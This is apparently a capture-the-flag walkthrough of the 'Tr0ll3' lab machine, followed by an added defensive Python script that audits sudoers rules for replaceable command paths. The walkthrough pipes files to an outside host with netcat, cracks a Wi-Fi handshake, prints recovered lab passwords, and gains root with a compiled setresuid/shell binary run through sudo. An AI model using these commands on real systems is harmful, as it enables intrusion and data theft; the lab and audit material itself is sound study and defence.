Information Gathering
IP Address | Open Ports |
---|---|
192.168.101.147 | TCP:22 |
$ ssh start@192.168.101.147
User: Start
start@Tr0ll3:~$ find / -type f -perm 0777 2>/tmp/1
start@Tr0ll3:~$ cat /var/log/.dist-manage/wytshadow.cap | nc 192.168.101.128 10035
Wi-Fi handshake capture
Cracking the handshake capture with aircrack-ng
start@Tr0ll3:~$ cat /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt | nc 192.168.101.128 10035
$ aircrack-ng -w gold_star.txt wytshadow.cap
User: wytshadow
wytshadow:gaUoCe34t1
wytshadow@Tr0ll3:/home/start$ sudo -l
wytshadow@Tr0ll3:/home/start$ cat /etc/nginx/sites-available/default
wytshadow@Tr0ll3:/home/start$ sudo /usr/sbin/service nginx start
wytshadow@Tr0ll3:/home/start$ netstat -lnput
$ lynx http://192.168.101.147:8080
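Lynx is a text-mode web browser. It was originally developed by Thomas Dickey in 1992 to give terminal users without a graphical interface a way to browse the web. Lynx is especially popular on Unix and Linux systems because it can browse web pages quickly from the command line without needing graphical support.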
Username: genphlux
Password: HF9nd0cR!
User: genphlux
genphlux@Tr0ll3:~$ su genphlux
genphlux@Tr0ll3:~$ file maleus
genphlux@Tr0ll3:~$ cat maleus
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
User: maleus
$ chmod 600 id_rsa
$ ssh maleus@192.168.101.147 -i id_rsa
maleus@Tr0ll3:~$ cat .viminfo
password:B^slc8I$
Privilege Escalation
Getting root by recompiling the binary that is run through sudo
maleus@Tr0ll3:~$ echo -e 'int main (void){setresuid(0, 0, 0);system("/bin/sh");}'>dont_even_bother.c
maleus@Tr0ll3:~$ rm dont_even_bother
maleus@Tr0ll3:~$ gcc dont_even_bother.c -o dont_even_bother
maleus@Tr0ll3:~$ sudo /home/maleus/dont_even_bother
# cat /root/flag.txt
Pr00fThatTh3L33tHax0rG0tTheFl@g!!
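
The last step works because the command run through sudo lives in a directory its user controls, so the file can be deleted and rebuilt regardless of the file's own permissions. The following is an added example, not part of the original walkthrough: a defender-side audit that flags sudo-allowed commands whose path can be replaced by a non-root user. The sudoers rule lines, UIDs and modes are constructed sample data modelled on the commands above, and the function names are hypothetical.

```python
import os
import re
from types import SimpleNamespace

RULE = re.compile(r"^\s*[^#\s]\S*\s+\S+\s*=\s*(.+)$")  # "user host = command list"
def commands(sudoers_text):
    """Yield the absolute command paths named in sudoers-style rule lines."""
    for line in sudoers_text.splitlines():
        m = RULE.match(line)
        for spec in re.sub(r"\([^)]*\)", "", m.group(1)).split(",") if m else ():
            spec = re.sub(r"^\s*([A-Z_]+:\s*)*", "", spec)  # drop tags like NOPASSWD:
            if spec.startswith("/"):
                yield spec.split()[0]

def weak_component(path, stat_fn=os.stat, trusted_uids=(0,)):
    """Return the first component of path a non-root user could replace, else None."""
    while True:
        try:
            st = stat_fn(path)
        except FileNotFoundError:
            st = None  # a missing target can be created by whoever owns the parent
        if st and (st.st_uid not in trusted_uids or st.st_mode & 0o022):
            return path  # owned by a non-root user, or group/world-writable
        if path == "/":
            return None
        path = os.path.dirname(path)

def audit(sudoers_text, stat_fn=os.stat):
    """Map each sudo-allowed command to the path component that makes it replaceable."""
    return {c: w for c in commands(sudoers_text) if (w := weak_component(c, stat_fn))}

# Constructed sample: assumed rules for the two sudo invocations in the walkthrough,
# with constructed ownership and modes standing in for a real filesystem.
SAMPLE_RULES = """\
wytshadow ALL=(root) /usr/sbin/service nginx start
maleus ALL=(root) /home/maleus/dont_even_bother
"""
SAMPLE_FS = {  # path: (owner uid, mode); the binary is root-owned, its directory is not
    "/": (0, 0o755), "/usr": (0, 0o755), "/usr/sbin": (0, 0o755),
    "/usr/sbin/service": (0, 0o755), "/home": (0, 0o755),
    "/home/maleus": (1000, 0o755), "/home/maleus/dont_even_bother": (0, 0o755),
}

def sample_stat(path):
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    uid, mode = SAMPLE_FS[path]
    return SimpleNamespace(st_uid=uid, st_mode=mode)

if __name__ == "__main__":
    print(audit(SAMPLE_RULES, sample_stat))
```

On a real host, call `audit()` with the contents of the sudoers files and the default `os.stat`; any finding means the rule should point at a root-owned path outside user-writable directories.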